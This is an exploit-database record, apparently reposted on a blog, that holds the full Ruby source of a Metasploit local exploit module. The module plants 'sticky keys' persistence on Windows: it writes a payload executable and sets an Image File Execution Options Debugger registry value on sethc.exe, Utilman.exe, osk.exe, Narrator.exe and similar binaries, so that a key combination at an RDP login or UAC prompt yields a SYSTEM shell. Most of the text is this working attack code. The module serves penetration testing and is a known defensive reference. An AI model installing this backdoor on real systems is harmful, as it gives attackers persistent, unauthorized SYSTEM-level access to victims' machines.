{“lastseen”:”2026-01-09T19:04:55″,”description”:”This module makes it possible to apply the ‘sticky keys’ hack to a session with appropriate rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP login screen or via a UAC confirmation dialog. The module modifies…”,”published”:”2026-01-09T18:58:43″,”modified”:”2026-01-09T18:58:43″,”type”:”metasploit”,”title”:”Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-PERSISTENCE-ACCESSIBILITY_FEATURES_DEBUGGER-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n include Msf::Post::File\\n include Msf::Exploit::EXE\\n include Msf::Exploit::Local::Persistence\\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Post::Windows::Registry\\n include Msf::Post::Windows::Priv\\n include Msf::Exploit::Deprecated\\n moved_from ‘post\/windows\/manage\/sticky_keys’\\n\\n DEBUG_REG_PATH = ‘HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows NT\\\\\\\\CurrentVersion\\\\\\\\Image File Execution Options’\\n DEBUG_REG_VALUE = ‘Debugger’\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Accessibility Features (Sticky Keys) Persistence via Debugger Registry Key’,\\n ‘Description’ =\\u003e %q{\\n This module makes it possible to apply the ‘sticky keys’ hack to a session with appropriate\\n rights. The hack provides a means to get a SYSTEM shell using UI-level interaction at an RDP\\n login screen or via a UAC confirmation dialog. The module modifies the Debug registry setting\\n for certain executables.\\n\\n The module options allow for this hack to be applied to:\\n\\n SETHC (sethc.exe is invoked when SHIFT is pressed 5 times),\\n UTILMAN (Utilman.exe is invoked by pressing WINDOWS+U),\\n OSK (osk.exe is invoked by pressing WINDOWS+U, then launching the on-screen keyboard),\\n DISP (DisplaySwitch.exe is invoked by pressing WINDOWS+P),\\n NARRATOR (Narrator.exe is invoked by pressing WINDOWS+CTR+ENTER),\\n ATBROKER (AtBroker.exe is invoked by launching accessibility features from the login screen, such as WINDOWS+CTR+ENTER).\\n\\n Custom payloads and binaries can be run as part of this exploit, but must be manually uploaded\\n to the target prior to running the module.\\n },\\n ‘Author’ =\\u003e [\\n ‘OJ Reeves’, # original module\\n ‘h00die’ # persistence mixin, narrator, atbroker, docs\\n ],\\n ‘Platform’ =\\u003e [‘win’],\\n ‘SessionTypes’ =\\u003e [‘meterpreter’, ‘shell’],\\n ‘References’ =\\u003e [\\n [‘URL’, ‘https:\/\/web.archive.org\/web\/20170201184448\/https:\/\/social.technet.microsoft.com\/Forums\/windows\/en-US\/a3968ec9-5824-4bc2-82a2-a37ea88c273a\/sticky-keys-exploit’],\\n [‘URL’, ‘https:\/\/blog.carnal0wnage.com\/2012\/04\/privilege-escalation-via-sticky-keys.html’],\\n [‘URL’, ‘https:\/\/support.microsoft.com\/en-us\/windows\/appendix-b-narrator-keyboard-commands-and-touch-gestures-8bdab3f4-b3e9-4554-7f28-8b15bd37410a’],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1183_IMAGE_FILE_EXECUTION_OPTIONS_INJECTION],\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1546_008_ACCESSIBILITY_FEATURES],\\n [‘URL’, ‘https:\/\/blogs.msdn.microsoft.com\/mithuns\/2010\/03\/24\/image-file-execution-options-ifeo\/’]\\n ],\\n ‘Targets’ =\\u003e [\\n [ ‘Automatic’, {} ]\\n ],\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘1995-04-24’, # windows 95 release date which included first sticky keys\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION, EVENT_DEPENDENT],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, CONFIG_CHANGES]\\n }\\n )\\n )\\n\\n register_options([\\n OptString.new(‘PAYLOAD_NAME’, [false, ‘Name of payload file to write. Random string as default.’]),\\n OptEnum.new(‘BINARY’, [true, ‘The target binary to add the exploit to.’, ‘SETHC’, [‘SETHC’, ‘UTILMAN’, ‘OSK’, ‘DISP’, ‘NARRATOR’, ‘ATBROKER’]]),\\n ])\\n end\\n\\n #\\n # Returns the name of the executable to modify the debugger settings of.\\n #\\n def get_target_exe_name\\n case datastore[‘BINARY’]\\n when ‘UTILMAN’\\n ‘Utilman.exe’\\n when ‘OSK’\\n ‘osk.exe’\\n when ‘DISP’\\n ‘DisplaySwitch.exe’\\n when ‘NARRATOR’\\n ‘Narrator.exe’\\n when ‘ATBROKER’\\n ‘AtBroker.exe’\\n else\\n ‘sethc.exe’\\n end\\n end\\n\\n #\\n # Returns the key combinations required to invoke the exploit once installed.\\n #\\n def get_target_key_combo\\n case datastore[‘BINARY’]\\n when ‘UTILMAN’\\n ‘WINDOWS+U’\\n when ‘OSK’\\n ‘WINDOWS+U, then launching the on-screen keyboard’\\n when ‘DISP’\\n ‘WINDOWS+P’\\n when ‘NARRATOR’\\n ‘WINDOWS+CTR+ENTER’\\n when ‘ATBROKER’\\n ‘Launching accessibility features from the login screen (such as WINDOWS+CTR+ENTER)’\\n else\\n ‘SHIFT 5 times’\\n end\\n end\\n\\n #\\n # Returns the full path to the target’s registry key based on the current target\\n # settings.\\n #\\n def get_target_exe_reg_key\\n \\”#{DEBUG_REG_PATH}\\\\\\\\#{get_target_exe_name}\\”\\n end\\n\\n def writable_dir\\n d = super\\n return session.sys.config.getenv(d) if d.start_with?(‘%’)\\n\\n d\\n end\\n\\n def check\\n print_warning(‘Payloads in %TEMP% will only last until reboot, you want to choose elsewhere.’) if datastore[‘WritableDir’].start_with?(‘%TEMP%’) # check the original value\\n return CheckCode::Safe(\\”#{writable_dir} doesnt exist\\”) unless exists?(writable_dir)\\n\\n return CheckCode::Safe(‘You have admin rights to run this Module’) unless is_admin?\\n\\n CheckCode::Appears(‘Likely exploitable’)\\n end\\n\\n def install_persistence\\n payload_name = datastore[‘PAYLOAD_NAME’] || Rex::Text.rand_text_alpha((rand(6..13)))\\n temp_path = writable_dir\\n payload_exe = generate_payload_exe\\n payload_pathname = temp_path + ‘\\\\\\\\’ + payload_name + ‘.exe’\\n vprint_status(\\”Payload pathname: #{payload_pathname}\\”)\\n fail_with(Failure::UnexpectedReply, \\”Error writing payload to: #{payload_pathname}\\”) unless write_file(payload_pathname, payload_exe)\\n target_key = get_target_exe_reg_key\\n registry_createkey(target_key)\\n registry_setvaldata(target_key, DEBUG_REG_VALUE, payload_pathname, ‘REG_SZ’)\\n\\n print_good(\\”‘Sticky keys’ successfully added. Launch the exploit at an RDP or UAC prompt by pressing #{get_target_key_combo}.\\”)\\n @clean_up_rc \\u003c\\u003c \\”rm \\\\\\”#{payload_pathname.gsub(‘\\\\\\\\’, ‘\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\’)}\\\\\\”\\\\n\\”\\n @clean_up_rc \\u003c\\u003c \\”execute -f cmd.exe -a \\\\\\”\/c reg delete \\\\\\”#{target_key}\\\\\\” \/v GlobalFlag \/f\\\\\\” -H\\\\n\\”\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/windows\/persistence\/accessibility_features_debugger.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/windows\/persistence\/accessibility_features_debugger\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-09T19:04:55″,”description”:”This module makes it possible to apply the ‘sticky keys’ hack to a session with appropriate rights. The hack provides a means to get a…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-34941","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n